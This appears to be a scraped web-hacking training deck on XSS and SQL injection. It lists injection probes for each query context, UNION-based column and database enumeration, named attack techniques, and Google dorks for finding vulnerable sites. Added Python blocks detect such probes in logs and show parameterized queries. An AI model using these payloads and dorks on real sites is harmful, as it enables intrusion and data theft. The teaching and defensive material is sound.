Date post: | 17-Feb-2018 |
Category: |
Documents |
Upload: | alex-chambi |
7/23/2019 x Sss Ql Injection
Hacking Web
Cross Site Scripting and SQL Injection
About me:
Course outline:
• Theory
• Risks
• Prerequisite knowledge
• How it works
• Some attacks
• Examples
• Attack vectors
• WAF bypass
• Dorks
Cross Site Scripting (XSS)
AND
SQL Injection
• <script>alert(1);</script>
• DORKS
• inurl:search.php?
• inurl:find.php?
• inurl:search.html
• inurl:find.html
• inurl:search.aspx
• inurl:find.aspx
DATABASE
DB servers:
• MySQL (open source)
• MSSQL
• MS-ACCESS
• Oracle
• Postgre SQL (open source)
• SQLite
SQL
• Structured Query Language is known as SQL. It is used to communicate with the database; because we are querying the database, it is called a query language.
What is SQL Injection?
• Injection [...] and famous in hacking today. Some novices think this is a minor thing because of some kinds of GUI software
Example of a database
BASIC QUERIES
select * from table1
select column1,column2 from table1
-------------------------------------------------------
BASIC CONDITIONS FOR LIMITING THE OUTPUT
Select * from students where id=1
Select * from students where f_name='camaline'
• If the query takes a numeric input:
  select * from tablename where id=1
  select * from tablename where id='1'
  select * from tablename where id="1"
  select * from tablename where id=(1)
  select * from tablename where id=('1')
  select * from tablename where id=("1")
• If the query takes a string-type input:
  select * from tablename where id='1'
  select * from tablename where id="1"
  select * from tablename where id=('1')
  select * from tablename where id=("1")
http://pageweb.com/report.php?id=2
• select * from tablename where id=2
• select * from tablename where id='2'
• select * from tablename where id="2"
• select * from tablename where id=(2)
• select * from tablename where id=('2')
• select * from tablename where id=("2")
BEFORE CHECKING THE TYPE OF QUERY BEING MADE.
• -- : MySQL Linux style
• --+ : MySQL Windows style
• # : Hash (URL-encode it when used)
• --+-
select * from tablename where id=2
Input : Reaction if it is integer-based injection
• 2' : It should cause an error or no output
• " : Should cause an error or no output
• 2 or 1=1 : Any output should come, but it may be different output
• 2 and 1=1 : Same output should come
• 2 and false : No output
• 2 and true : Same output
• 2--+ : Same output. I used --+ to comment; later I'll show how to know which one to use
• 2 and true--+ : Same output
select * from tablename where id='2'
Input : Reaction if it is single-quote-based injection
• 2' : It should cause an error or no output
• 2" : No error, same output
• 2' or '1'='1 : Any output should come, but it may be different output
• 2' and '1'='1 : Same output should come
• 2' and false--+ : No output
• 2' and true--+ : Same output
select * from tablename where id="2"
Input : Reaction if it is double-quote-based injection
• 2' : No error, same output
• 2" : It should cause an error or no output
• 2" or "1"="1 : Any output should come, but it may be different output
• 2" and "1"="1 : Same output should come
• 2" and false--+ : No output
• 2" and true--+ : Same output
select * from tablename where id=(2)
Input : Reaction if it is integer-based, bracket-enclosed injection
• 2' : It should cause an error or no output
• " : Should cause an error or no output
• 2 or 1=1 : Output should come, but it may be different output
• 2 and 1=1 : Output should come, but it may be different output
• 2 and false : No output
• 2 and true : Same output
• 2--+ : Error or no output. Here you can tell that some bracket is used
• --
select * from tablename where id=('2')
Input : Reaction if it is bracket-enclosed, single-quote-based injection
• 2' : It should cause an error or no output
• 2" : No error, same output
• 2' or '1'='1 : Any output should come, but it may be different output
• 2' and '1'='1 : Any output should come, but it may be different output
• 2' and false--+ : No output or error
• 2' and true--+ : No output or error
• 2') and False--+ : No output
• 2' and true--+ : Same output
select * from tablename where id=("2")
Input : Reaction if it is bracket-enclosed, double-quote-based injection
• 2' : No error, same output
• 2" : Error or no output
• 2" or "1"="1 : Any output should come, but it may be different output
• 2" and "1"="1 : Any output should come, but it may be different output
• 2" and false--+ : No output or error
• 2" and true--+ : No output or error
• 2") and False--+ : No output
• 2" and true--+ : Same output
THREE BASIC RULES OF INJECTION
1. Balance.
2. Inject.
3. Commenting.
Select * from tablename where id='<input>'
"http://fakesite.com/report.php?id=2' order by 1--+"
So we will inject in place of <input>:
Select * from tablename where id='2' order by 1--+'
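Every probe in the reaction tables above, and the order by request on this slide, puts something other than digits into a numeric id parameter, which is what a defender can key on in web server logs. An added detection example (not from the original slides): the log lines are constructed, and the log format, the rule names and the classify/scan helpers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the slides); documentation-range IPs.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /report.php?id=2 HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /report.php?id=2%27 HTTP/1.1" 500 0
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /report.php?id=2%20and%20false--+ HTTP/1.1" 200 0
198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /report.php?id=2%27%20order%20by%201--+ HTTP/1.1" 200 512
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /report.php?id=17 HTTP/1.1" 200 498
"""

# Client address, request target and status from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# Hypothetical rule names, one per probe family shown on the slides.
RULES = [
    ("quote", re.compile(r"['\"]")),
    ("boolean", re.compile(r"\b(?:and|or)\b\s+(?:true|false|\S+\s*=)", re.I)),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union", re.compile(r"\bunion\b.+\bselect\b", re.I)),
    ("comment", re.compile(r"(?:--|#)\s*-?$")),
]

def classify(value):
    """Return the names of the rules that match a decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]

def scan(log_text, param="id"):
    """Return (client, value, status, tags) for every non-integer id value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, []):
            if not value.isdigit():  # a numeric id should be digits only
                findings.append((client, value, int(status), classify(value)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Several tagged requests from one client within seconds, with status codes or response sizes changing between them, is the pattern the reaction tables produce.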
HOW AND WHY TO FIND THE NUMBER OF COLUMNS
• Select fname,lname from students where id=1
• UNION statement
• Select fname,lname from students where id=1 union select fname,lname from students where id=2
• Select f_name,l_name from students where id=1 union select 1,2
  fname    lname
  Emily    watson
  1        2
• Select f_name,l_name from students where id=1 union select 'hello','bye'
  fname    lname
  Emily    watson
  hello    bye
• Select f_name,l_name from students where id=1 union select database(),user()
  fname    lname
  Emily    watson
  fakedb1  fakeuser@localhost
• Select * from students where id=1 union select f_name,l_name from students where id=2
ORDER BY
Query : Output
• select * from students order by 1 : It will output all the rows and sort them by the first column, which is id
• select * from students order by 2 : It will output all the rows and sort them by the second column, which is fname
• select * from students order by 3 : It will output all the rows and sort them by the third column, which is lname
• select * from students order by 4 : It will output all the rows and sort them by the fourth column, which is rollno
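The UNION queries from the slides above, replayed as an added example (not from the original slides) against a constructed students table, show why the concatenated query returns the injected row while a bound parameter does not. SQLite stands in for MySQL here; the second row, the rollno values and the function names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the slides' students table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE students "
               "(id INTEGER PRIMARY KEY, fname TEXT, lname TEXT, rollno INTEGER)")
    db.executemany("INSERT INTO students VALUES (?, ?, ?, ?)",
                   [(1, "Emily", "watson", 101),      # row shown on the slides
                    (2, "Sample", "student", 102)])   # constructed row
    return db

def lookup_concat(db, user_id):
    """Vulnerable form: the request value becomes part of the SQL text."""
    sql = "SELECT fname, lname FROM students WHERE id=" + user_id
    return db.execute(sql).fetchall()

def lookup_param(db, user_id):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    sql = "SELECT fname, lname FROM students WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def lookup_strict(db, user_id):
    """Bound parameter plus a type check: int() raises ValueError on extra text."""
    return lookup_param(db, int(user_id))

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 union select 1,2"):
        print(repr(value))
        print("  concatenated :", lookup_concat(db, value))
        print("  parameterized:", lookup_param(db, value))
        try:
            print("  strict       :", lookup_strict(db, value))
        except ValueError:
            print("  strict       : rejected (not an integer)")
```

With the bound parameter, the whole string is compared to the id column as a single value, so the union clause never reaches the SQL parser.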
XPATH-Error-Based-Injection-Extractvalue
XPATH-Error-Based-Injection-UpdateXML
Error-Based-Injection-Subquery-Injection
Blind-SQL-Injection
bypass-login-using-sql-injection
Dump-database-from-login-form-sql
time-based-blind-injection
insert-query-injection
group-by-and-order-by-sql-injection
union-based-Oracle-Injection
Dorks
• inurl:index.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=
• inurl:pageid=